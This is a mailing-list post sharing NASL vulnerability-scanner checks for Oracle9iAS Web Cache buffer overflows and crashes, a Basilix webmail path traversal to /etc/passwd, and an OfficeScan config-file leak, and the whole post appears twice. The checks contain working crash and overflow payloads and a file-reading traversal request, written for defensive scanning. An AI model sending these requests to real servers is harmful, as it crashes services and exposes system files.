BTW, it seems that we do not have any generic HTTP Cookie overflow test.
Does anybody know a vulnerable server?
Does anybody know how to extract the version number from the Oracle9iAS
banner?
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# Date: Thu, 18 Oct 2001 16:16:20 +0200
# From: "andreas junestam" <andreas.junestam@defcom.com>
# Affiliation: Defcom
# To: "bugtraq" <bugtraq@securityfocus.com>
# Subject: def-2001-30
#
# Affected:
# Oracle9iAS Web Cache/2.0.0.1.0
#
if(description)
{
# script_id(TBD);
script_version ("$Revision$");
name["english"] = "HTTP User-Agent overflow";
script_name(english:name["english"]);
desc["english"] = "It was possible to kill the web server by
sending an invalid GET request with a too long User-Agent field
A cracker may exploit this vulnerability to make your web server
crash continually or even execute arbirtray code on your system.
Solution : upgrade your software or protect it with a filtering reverse proxy
Risk factor : High";
script_description(english:desc["english"]);
summary["english"] = "Too long User-Agent kills the web server";
script_summary(english:summary["english"]);
script_category(ACT_MIXED_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Gain root remotely";
family["francais"] = "Passer root à distance";
script_family(english:family["english"], francais:family["francais"]);
script_require_ports("Services/www", 80);
exit(0);
}
########
if (safe_checks()) exit(0);
# Need at least 4000 for Oracle Web
r = string("GET / HTTP/1.0\r\nUser-Agent: ", crap(4000), "\r\n\r\n");
port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);
soc = http_open_socket(port);
if(! soc) exit(0);
send(socket:soc, data: r);
r = recv(socket:soc, length:4096);
close(soc);
sleep(1);
soc = open_sock_tcp(port);
if(!soc) { security_hole(port); exit(0); }
close(soc);
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#
# References:
# Date: Thu, 18 Oct 2001 16:16:20 +0200
# From: "andreas junestam" <andreas.junestam@defcom.com>
# Affiliation: Defcom
# To: "bugtraq" <bugtraq@securityfocus.com>
# Subject: def-2001-30
#
# Affected:
# Oracle9iAS Web Cache/2.0.0.1.0
#
if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "Oracle9iAS too long URL";
name["francais"] = "URL trop longue contre Oracle9iAS";
script_name(english:name["english"], francais:name["francais"]);
desc["english"] = "
It may be possible to make the Oracle9i application server
crash or execute arbitrary code by sending it a too long url
specially crafted URL.
Risk factor : High
Solution : Upgrade your server.";
script_description(english:desc["english"]);
summary["english"] = "Oracle9iAS buffer overflow";
script_summary(english:summary["english"]);
script_category(ACT_MIXED_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
francais:"Ce script est Copyright (C) 2002 Michel Arboi");
family["english"] = "Gain root remotely";
family["francais"] = "Passer root à distance";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("find_service.nes");
script_require_ports("Services/www",1100, 4000, 4001, 4002);
exit(0);
}
#
if(safe_checks())
{
exit(0);
}
url = string("/", crap(data: "A", length: 3095), crap(data: "N", length: 4));
port = get_kb_item("Services/www");
if(!port)port = 1100;
if (! get_port_state(port)) exit(0);
soc = open_sock_tcp(port);
if (! soc) exit(0);
r = http_get(item: url, port: port);
send(socket:soc, data:r);
a = recv(socket: soc, length: 4096);
close(soc);
sleep(1);
include("http_func.inc");
if(! http_is_alive(port: port)) {
security_hole(port);
set_kb_item(name:"www/too_long_url_crash", value:TRUE);
exit(0);
}
# Note: sending 'GET /<3571 x A> HTTP/1.0' will kill it too.
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# Date: Thu, 18 Oct 2001 16:16:20 +0200
# From: "andreas junestam" <andreas.junestam@defcom.com>
# Affiliation: Defcom
# To: "bugtraq" <bugtraq@securityfocus.com>
# Subject: def-2001-30
#
# Affected:
# Oracle9iAS Web Cache/2.0.0.1.0
#
if(description)
{
# script_id(TBD);
script_version ("$Revision$");
name["english"] = "Oracle webcache admin interface";
script_name(english:name["english"]);
desc["english"] = "It was possible to kill the web server by
requesting '/.'
A cracker may exploit this vulnerability to make your web server
crash continually.
Solution : upgrade your software or protect it with a filtering reverse proxy
Risk factor : Low";
script_description(english:desc["english"]);
summary["english"] = "Get /. crashes Oracle webcache admin";
script_summary(english:summary["english"]);
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Denial of Service";
family["francais"] = "Déni de service";
script_family(english:family["english"], francais:family["francais"]);
script_require_ports("Services/www", 4000);
exit(0);
}
########
if (safe_checks()) exit(0);
port = get_kb_item("Services/www");
if(!port) port = 4000;
if(! get_port_state(port)) exit(0);
soc = http_open_socket(port);
if(! soc) exit(0);
# The advisory says "GET /. HTTP/1.0" - should we only try this HTTP/1.0
# request?
r = http_get(port: port, item: "/.");
send(socket:soc, data: r);
r = recv(socket:soc, length:4096);
close(soc);
sleep(1);
soc = open_sock_tcp(port);
if(!soc) { security_hole(port); exit(0); }
close(soc);
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#
# References:
# From: "karol _" <su@poczta.arena.pl>
# To: bugtraq@securityfocus.com
# CC: arslanm@Bilkent.EDU.TR
# Date: Fri, 06 Jul 2001 21:04:55 +0200
# Subject: basilix bug
#
if(description)
{
#script_id(TBD);
script_version ("$Revision$");
#script_cve_id("TBD");
name["english"] = "Basilix webmail dummy request vulnerability";
script_name(english:name["english"]);
desc["english"] = "
basilix.php3 is installed on this web server. Some versions
of this webmail software allow the users to read any file on
the system with the permission of the webmail software, and
execute any PHP.
Solution : Update Basilix or remove DUMMY from lang.inc
Risk factor : Low";
script_description(english:desc["english"]);
summary["english"] = "Checks for the presence of basilix.php3";
summary["francais"] = "Vérifie la présence de basilix.php3";
script_summary(english:summary["english"], francais:summary["francais"]);
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
francais:"Ce script est Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("find_service.nes", "no404.nasl, "logins.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
# The script code starts here
port = get_kb_item("Services/www");
if (! port) port = 80;
if (! get_port_state(port)) exit(0);
soc = open_sock_tcp(port);
if (! soc) exit(0);
user = get_kb_item("http/login");
pass = get_kb_item("http/password");
if (! user) user="blah";
if (! pass) pass="blah";
url=string("/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=", user, "&password=", pass);
req = http_get(port: port, item: url);
send(socket: soc, data: req);
r = recv_line(socket: soc, length: 512);
close(soc);
if (" 200" >< r) { security_hole(port); exit(0); }
if (is_cgi_installed(port: port, item: "/basilix.php3")) security_warning(port);
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#
# References :
# Date: Tue, 16 Oct 2001 11:34:56 +0900
# From: "snsadv@lac.co.jp" <snsadv@lac.co.jp>
# To: bugtraq@securityfocus.com
# Subject: [SNS Advisory No.44] Trend Micro OfficeScan Corporate Edition
# (Virus Buster Corporate Edition) Configuration File Disclosure Vulnerability
#
if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "OfficeScan configuration file disclosure";
name["francais"] = "OfficeScan révèle son fichier de configuration";
script_name(english:name["english"], francais:name["francais"]);
desc["english"] = "
Trend Micro OfficeScan Corporate Edition (Japanese version: Virus
Buster Corporate Edition) web-based management console let anybody
access /officescan/hotdownload without authentication.
Reading the configuration file /officescan/hotdownload/ofcscan.ini
will reveal information on your system. More, it contains passwords
that are encrypted by a weak specific algorithm; so they might be
decrypted
Solution : upgrade OfficeScan
Risk factor : Low";
script_description(english:desc["english"]);
summary["english"] = "Checks for the presence of /officescan/hotdownload/ofscan.ini";
summary["francais"] = "Vérifie la présence de /officescan/hotdownload/ofscan.ini";
script_summary(english:summary["english"], francais:summary["francais"]);
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
francais:"Ce script est Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("find_service.nes", "no404.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
# The script code starts here
port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);
soc = open_sock_tcp(port);
if (! soc) exit(0);
req = http_get(port: port, item: "/officescan/hotdownload/ofscan.ini");
send(socket: soc, data: req);
r = recv_line(socket: soc, length: 512);
close(soc);
if (" 200" >< r) { security_hole(port); exit(0); }
Does anybody know a vulnerable server?
Does anybody know how to extract the version number from the Oracle9iAS
banner?
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# Date: Thu, 18 Oct 2001 16:16:20 +0200
# From: "andreas junestam" <andreas.junestam@defcom.com>
# Affiliation: Defcom
# To: "bugtraq" <bugtraq@securityfocus.com>
# Subject: def-2001-30
#
# Affected:
# Oracle9iAS Web Cache/2.0.0.1.0
#
if(description)
{
# script_id(TBD);
script_version ("$Revision$");
name["english"] = "HTTP User-Agent overflow";
script_name(english:name["english"]);
desc["english"] = "It was possible to kill the web server by
sending an invalid GET request with a too long User-Agent field
A cracker may exploit this vulnerability to make your web server
crash continually or even execute arbirtray code on your system.
Solution : upgrade your software or protect it with a filtering reverse proxy
Risk factor : High";
script_description(english:desc["english"]);
summary["english"] = "Too long User-Agent kills the web server";
script_summary(english:summary["english"]);
script_category(ACT_MIXED_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Gain root remotely";
family["francais"] = "Passer root à distance";
script_family(english:family["english"], francais:family["francais"]);
script_require_ports("Services/www", 80);
exit(0);
}
########
if (safe_checks()) exit(0);
# Need at least 4000 for Oracle Web
r = string("GET / HTTP/1.0\r\nUser-Agent: ", crap(4000), "\r\n\r\n");
port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);
soc = http_open_socket(port);
if(! soc) exit(0);
send(socket:soc, data: r);
r = recv(socket:soc, length:4096);
close(soc);
sleep(1);
soc = open_sock_tcp(port);
if(!soc) { security_hole(port); exit(0); }
close(soc);
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#
# References:
# Date: Thu, 18 Oct 2001 16:16:20 +0200
# From: "andreas junestam" <andreas.junestam@defcom.com>
# Affiliation: Defcom
# To: "bugtraq" <bugtraq@securityfocus.com>
# Subject: def-2001-30
#
# Affected:
# Oracle9iAS Web Cache/2.0.0.1.0
#
if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "Oracle9iAS too long URL";
name["francais"] = "URL trop longue contre Oracle9iAS";
script_name(english:name["english"], francais:name["francais"]);
desc["english"] = "
It may be possible to make the Oracle9i application server
crash or execute arbitrary code by sending it a too long url
specially crafted URL.
Risk factor : High
Solution : Upgrade your server.";
script_description(english:desc["english"]);
summary["english"] = "Oracle9iAS buffer overflow";
script_summary(english:summary["english"]);
script_category(ACT_MIXED_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
francais:"Ce script est Copyright (C) 2002 Michel Arboi");
family["english"] = "Gain root remotely";
family["francais"] = "Passer root à distance";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("find_service.nes");
script_require_ports("Services/www",1100, 4000, 4001, 4002);
exit(0);
}
#
if(safe_checks())
{
exit(0);
}
url = string("/", crap(data: "A", length: 3095), crap(data: "N", length: 4));
port = get_kb_item("Services/www");
if(!port)port = 1100;
if (! get_port_state(port)) exit(0);
soc = open_sock_tcp(port);
if (! soc) exit(0);
r = http_get(item: url, port: port);
send(socket:soc, data:r);
a = recv(socket: soc, length: 4096);
close(soc);
sleep(1);
include("http_func.inc");
if(! http_is_alive(port: port)) {
security_hole(port);
set_kb_item(name:"www/too_long_url_crash", value:TRUE);
exit(0);
}
# Note: sending 'GET /<3571 x A> HTTP/1.0' will kill it too.
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# Date: Thu, 18 Oct 2001 16:16:20 +0200
# From: "andreas junestam" <andreas.junestam@defcom.com>
# Affiliation: Defcom
# To: "bugtraq" <bugtraq@securityfocus.com>
# Subject: def-2001-30
#
# Affected:
# Oracle9iAS Web Cache/2.0.0.1.0
#
if(description)
{
# script_id(TBD);
script_version ("$Revision$");
name["english"] = "Oracle webcache admin interface";
script_name(english:name["english"]);
desc["english"] = "It was possible to kill the web server by
requesting '/.'
A cracker may exploit this vulnerability to make your web server
crash continually.
Solution : upgrade your software or protect it with a filtering reverse proxy
Risk factor : Low";
script_description(english:desc["english"]);
summary["english"] = "Get /. crashes Oracle webcache admin";
script_summary(english:summary["english"]);
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Denial of Service";
family["francais"] = "Déni de service";
script_family(english:family["english"], francais:family["francais"]);
script_require_ports("Services/www", 4000);
exit(0);
}
########
if (safe_checks()) exit(0);
port = get_kb_item("Services/www");
if(!port) port = 4000;
if(! get_port_state(port)) exit(0);
soc = http_open_socket(port);
if(! soc) exit(0);
# The advisory says "GET /. HTTP/1.0" - should we only try this HTTP/1.0
# request?
r = http_get(port: port, item: "/.");
send(socket:soc, data: r);
r = recv(socket:soc, length:4096);
close(soc);
sleep(1);
soc = open_sock_tcp(port);
if(!soc) { security_hole(port); exit(0); }
close(soc);
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#
# References:
# From: "karol _" <su@poczta.arena.pl>
# To: bugtraq@securityfocus.com
# CC: arslanm@Bilkent.EDU.TR
# Date: Fri, 06 Jul 2001 21:04:55 +0200
# Subject: basilix bug
#
if(description)
{
#script_id(TBD);
script_version ("$Revision$");
#script_cve_id("TBD");
name["english"] = "Basilix webmail dummy request vulnerability";
script_name(english:name["english"]);
desc["english"] = "
basilix.php3 is installed on this web server. Some versions
of this webmail software allow the users to read any file on
the system with the permission of the webmail software, and
execute any PHP.
Solution : Update Basilix or remove DUMMY from lang.inc
Risk factor : Low";
script_description(english:desc["english"]);
summary["english"] = "Checks for the presence of basilix.php3";
summary["francais"] = "Vérifie la présence de basilix.php3";
script_summary(english:summary["english"], francais:summary["francais"]);
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
francais:"Ce script est Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("find_service.nes", "no404.nasl, "logins.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
# The script code starts here
port = get_kb_item("Services/www");
if (! port) port = 80;
if (! get_port_state(port)) exit(0);
soc = open_sock_tcp(port);
if (! soc) exit(0);
user = get_kb_item("http/login");
pass = get_kb_item("http/password");
if (! user) user="blah";
if (! pass) pass="blah";
url=string("/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=", user, "&password=", pass);
req = http_get(port: port, item: url);
send(socket: soc, data: req);
r = recv_line(socket: soc, length: 512);
close(soc);
if (" 200" >< r) { security_hole(port); exit(0); }
if (is_cgi_installed(port: port, item: "/basilix.php3")) security_warning(port);
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#
# References :
# Date: Tue, 16 Oct 2001 11:34:56 +0900
# From: "snsadv@lac.co.jp" <snsadv@lac.co.jp>
# To: bugtraq@securityfocus.com
# Subject: [SNS Advisory No.44] Trend Micro OfficeScan Corporate Edition
# (Virus Buster Corporate Edition) Configuration File Disclosure Vulnerability
#
if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "OfficeScan configuration file disclosure";
name["francais"] = "OfficeScan révèle son fichier de configuration";
script_name(english:name["english"], francais:name["francais"]);
desc["english"] = "
Trend Micro OfficeScan Corporate Edition (Japanese version: Virus
Buster Corporate Edition) web-based management console let anybody
access /officescan/hotdownload without authentication.
Reading the configuration file /officescan/hotdownload/ofcscan.ini
will reveal information on your system. More, it contains passwords
that are encrypted by a weak specific algorithm; so they might be
decrypted
Solution : upgrade OfficeScan
Risk factor : Low";
script_description(english:desc["english"]);
summary["english"] = "Checks for the presence of /officescan/hotdownload/ofscan.ini";
summary["francais"] = "Vérifie la présence de /officescan/hotdownload/ofscan.ini";
script_summary(english:summary["english"], francais:summary["francais"]);
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
francais:"Ce script est Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("find_service.nes", "no404.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
# The script code starts here
port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);
soc = open_sock_tcp(port);
if (! soc) exit(0);
req = http_get(port: port, item: "/officescan/hotdownload/ofscan.ini");
send(socket: soc, data: req);
r = recv_line(socket: soc, length: 512);
close(soc);
if (" 200" >< r) { security_hole(port); exit(0); }